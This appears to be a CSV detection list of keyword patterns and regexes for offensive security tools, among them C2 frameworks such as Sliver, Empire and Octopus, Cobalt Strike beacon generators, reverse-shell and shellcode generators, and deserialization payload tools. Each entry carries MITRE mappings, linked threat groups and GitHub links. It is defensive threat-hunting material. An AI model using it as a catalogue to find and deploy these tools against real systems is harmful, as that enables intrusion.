"*generate payload=*",".{0,1000}generate\spayload\=.{0,1000}","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021  -  T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","0","#linux","N/A","10","10","3992","642","2025-01-19T18:37:12Z","2022-10-25T22:02:59Z","45557"
"*generate --tcp-pivot *",".{0,1000}generate\s\-\-tcp\-pivot\s.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","45558"
"*generate/canaries.go*",".{0,1000}generate\/canaries\.go.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","1","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","45559"
"*generate/implants.go*",".{0,1000}generate\/implants\.go.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","1","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","45560"
"*generate_beacon*",".{0,1000}generate_beacon.{0,1000}","offensive_tool_keyword","cobaltstrike","beacon generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/eddiezab/aggressor-scripts/tree/master","1","1","N/A","N/A","10","10","1","0","2021-01-29T21:01:58Z","2021-01-29T21:00:26Z","45561"
"*generate_beanshell1*",".{0,1000}generate_beanshell1.{0,1000}","offensive_tool_keyword","pysoserial","Python-based proof-of-concept tool for generating payloads that utilize unsafe Java object deserialization.","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Resource Development","https://github.com/aStrowxyu/Pysoserial","1","0","N/A","N/A","9","1","9","1","2021-12-06T07:41:55Z","2021-11-16T01:55:31Z","45562"
"*generate_exploit_path_from_template*",".{0,1000}generate_exploit_path_from_template.{0,1000}","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tool","https://github.com/p0dalirius/Coercer","1","0","#content","N/A","10","10","1945","195","2025-03-21T07:42:42Z","2022-06-30T16:52:33Z","45563"
"*generate_golden_saml*",".{0,1000}generate_golden_saml.{0,1000}","offensive_tool_keyword","whiskeysamlandfriends","GoldenSAML Attack Libraries and Framework","T1606.002","TA0006","N/A","N/A","Credential Access","https://github.com/secureworks/whiskeysamlandfriends","1","1","N/A","N/A","N/A","1","72","9","2024-06-05T14:56:28Z","2021-11-04T15:30:12Z","45564"
"*generate_hta operation1*",".{0,1000}generate_hta\soperation1.{0,1000}","offensive_tool_keyword","octopus","Octopus is an open source. pre-operation C2 server based on python which can control an Octopus powershell agent through HTTP/S.","T1059.001 - T1105 - T1071.001 - T1219 - T1573","TA0011 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/mhaskar/Octopus","1","0","N/A","N/A","10","10","750","156","2021-07-06T23:52:37Z","2019-08-30T21:09:07Z","45565"
"*generate_jdk8u20*",".{0,1000}generate_jdk8u20.{0,1000}","offensive_tool_keyword","pysoserial","Python-based proof-of-concept tool for generating payloads that utilize unsafe Java object deserialization.","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Resource Development","https://github.com/aStrowxyu/Pysoserial","1","0","N/A","N/A","9","1","9","1","2021-12-06T07:41:55Z","2021-11-16T01:55:31Z","45566"
"*generate_loader_cmd*",".{0,1000}generate_loader_cmd.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","45567"
"*generate_mozillarhino1*",".{0,1000}generate_mozillarhino1.{0,1000}","offensive_tool_keyword","pysoserial","Python-based proof-of-concept tool for generating payloads that utilize unsafe Java object deserialization.","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Resource Development","https://github.com/aStrowxyu/Pysoserial","1","0","N/A","N/A","9","1","9","1","2021-12-06T07:41:55Z","2021-11-16T01:55:31Z","45568"
"*generate_mozillarhino2*",".{0,1000}generate_mozillarhino2.{0,1000}","offensive_tool_keyword","pysoserial","Python-based proof-of-concept tool for generating payloads that utilize unsafe Java object deserialization.","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Resource Development","https://github.com/aStrowxyu/Pysoserial","1","0","N/A","N/A","9","1","9","1","2021-12-06T07:41:55Z","2021-11-16T01:55:31Z","45569"
"*generate_payload(language, ip, port)*",".{0,1000}generate_payload\(language,\sip,\sport\).{0,1000}","offensive_tool_keyword","Rev-Shell","Basic script to generate reverse shell payloads","T1055.011 - T1021.005 - T1560.001","TA0002 - TA0005 - TA0042 - TA0011","N/A","N/A","C2","https://github.com/washingtonP1974/Rev-Shell","1","0","N/A","N/A","3","10","29","1","2024-03-20T13:58:21Z","2024-03-20T13:37:12Z","45570"
"*generate_powershell operation1*",".{0,1000}generate_powershell\soperation1.{0,1000}","offensive_tool_keyword","octopus","Octopus is an open source. pre-operation C2 server based on python which can control an Octopus powershell agent through HTTP/S.","T1059.001 - T1105 - T1071.001 - T1219 - T1573","TA0011 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/mhaskar/Octopus","1","0","N/A","N/A","10","10","750","156","2021-07-06T23:52:37Z","2019-08-30T21:09:07Z","45571"
"*generate_powershell_exe*",".{0,1000}generate_powershell_exe.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","45572"
"*generate_powershell_shellcode(*",".{0,1000}generate_powershell_shellcode\(.{0,1000}","offensive_tool_keyword","canisrufus","A stealthy Python based Windows backdoor that uses Github as a command and control server","T1105 - T1071 - T1027","TA0003 - TA0011 - TA0005 - TA0010","N/A","Black Basta","C2","https://github.com/maldevel/canisrufus","1","0","N/A","N/A","10","10","263","78","2017-08-15T15:46:20Z","2017-08-12T06:49:40Z","45573"
"*generate_powershell_shellcode*",".{0,1000}generate_powershell_shellcode.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","45574"
"*generate_python_exe*",".{0,1000}generate_python_exe.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","45575"
"*generate_python_shellcode*",".{0,1000}generate_python_shellcode.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","45576"
"*generate_raw_payload*",".{0,1000}generate_raw_payload.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tool","https://github.com/phra/PEzor","1","1","N/A","N/A","10","10","1936","330","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z","45577"
"*generate_spoofed_args_exe*",".{0,1000}generate_spoofed_args_exe.{0,1000}","offensive_tool_keyword","octopus","Octopus is an open source. pre-operation C2 server based on python which can control an Octopus powershell agent through HTTP/S.","T1059.001 - T1105 - T1071.001 - T1219 - T1573","TA0011 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/mhaskar/Octopus","1","1","N/A","N/A","10","10","750","156","2021-07-06T23:52:37Z","2019-08-30T21:09:07Z","45578"
"*generate_stageless*",".{0,1000}generate_stageless.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","45579"
"*generate_unmanaged_exe operation1 *.exe",".{0,1000}generate_unmanaged_exe\soperation1\s.{0,1000}\.exe","offensive_tool_keyword","octopus","Octopus is an open source. pre-operation C2 server based on python which can control an Octopus powershell agent through HTTP/S.","T1059.001 - T1105 - T1071.001 - T1219 - T1573","TA0011 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/mhaskar/Octopus","1","0","N/A","N/A","10","10","750","156","2021-07-06T23:52:37Z","2019-08-30T21:09:07Z","45580"
"*generate_x64_shellcode*",".{0,1000}generate_x64_shellcode.{0,1000}","offensive_tool_keyword","octopus","Octopus is an open source. pre-operation C2 server based on python which can control an Octopus powershell agent through HTTP/S.","T1059.001 - T1105 - T1071.001 - T1219 - T1573","TA0011 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/mhaskar/Octopus","1","1","N/A","N/A","10","10","750","156","2021-07-06T23:52:37Z","2019-08-30T21:09:07Z","45581"
"*generate_x86_shellcode*",".{0,1000}generate_x86_shellcode.{0,1000}","offensive_tool_keyword","octopus","Octopus is an open source. pre-operation C2 server based on python which can control an Octopus powershell agent through HTTP/S.","T1059.001 - T1105 - T1071.001 - T1219 - T1573","TA0011 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/mhaskar/Octopus","1","1","N/A","N/A","10","10","750","156","2021-07-06T23:52:37Z","2019-08-30T21:09:07Z","45582"
"*Generated random password for socks proxy:*",".{0,1000}Generated\srandom\spassword\sfor\ssocks\sproxy\:.{0,1000}","offensive_tool_keyword","burpsuite","A BurpSuite extension to deploy an OpenVPN config file to DigitalOcean and set up a SOCKS proxy to route traffic through it","T1592 - T1021 - T1573 - T1090 - T1071","TA0005","N/A","Black Basta","Defense Evasion","https://github.com/honoki/burp-digitalocean-openvpn-socks","1","0","N/A","N/A","10","1","49","9","2024-02-26T13:59:20Z","2024-02-26T13:59:17Z","45583"
"*Generated shellcode successfully saved in file *",".{0,1000}Generated\sshellcode\ssuccessfully\ssaved\sin\sfile\s.{0,1000}","offensive_tool_keyword","InflativeLoading","Dynamically convert a native EXE to PIC shellcode by prepending a shellcode stub","T1027 - T1055 - T1140","TA0005 - TA0042","N/A","N/A","Defense Evasion","https://github.com/senzee1984/InflativeLoading","1","0","N/A","N/A","10","4","309","64","2024-04-12T17:14:07Z","2024-01-05T03:59:33Z","45584"
"*GenerateDllBase64Hta*",".{0,1000}GenerateDllBase64Hta.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","45585"
"*GenerateExeBase64*",".{0,1000}GenerateExeBase64.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","45586"
"*GenerateForcedBrowseWordlist.py*",".{0,1000}GenerateForcedBrowseWordlist\.py.{0,1000}","offensive_tool_keyword","burpsuite","A collection of scripts to extend Burp Suite","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","Black Basta","Discovery","https://github.com/laconicwolf/burp-extensions","1","1","N/A","network exploitation tool","N/A","2","142","31","2019-04-08T00:49:45Z","2018-03-23T16:05:01Z","45587"
"*generateInjectBinFile*",".{0,1000}generateInjectBinFile.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","45588"
"*Generate-Macro.ps1*",".{0,1000}Generate\-Macro\.ps1.{0,1000}","offensive_tool_keyword","Generate-Macro","Generate-Macro is a standalone PowerShell script that will generate a malicious Microsoft Office document with a specified payload and persistence method.","T1566 - T1059 - T1086 - T1056 - T1567","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tool","https://github.com/enigma0x3/Generate-Macro","1","1","N/A","N/A","N/A","7","677","210","2016-10-27T20:48:59Z","2015-01-09T01:34:22Z","45589"
"*GenerateParameterWordlist.py*",".{0,1000}GenerateParameterWordlist\.py.{0,1000}","offensive_tool_keyword","burpsuite","A collection of scripts to extend Burp SuiteExtracts the parameters from URLs in scope or from a selected host","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","Black Basta","Discovery","https://github.com/laconicwolf/burp-extensions","1","1","N/A","network exploitation tool","N/A","2","142","31","2019-04-08T00:49:45Z","2018-03-23T16:05:01Z","45590"
"*GenerateReverseTcpDrone*",".{0,1000}GenerateReverseTcpDrone.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105  -  T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","N/A","10","10","399","57","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z","45591"
"*generate-rotating-beacon.*",".{0,1000}generate\-rotating\-beacon\..{0,1000}","offensive_tool_keyword","cobaltstrike","beacon generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/eddiezab/aggressor-scripts/tree/master","1","1","N/A","N/A","10","10","1","0","2021-01-29T21:01:58Z","2021-01-29T21:00:26Z","45592"
"*GeneratesShellcodeFromPEorDll*",".{0,1000}GeneratesShellcodeFromPEorDll.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","45593"
"*Generating sliver binary for *",".{0,1000}Generating\ssliver\sbinary\sfor\s.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","45594"
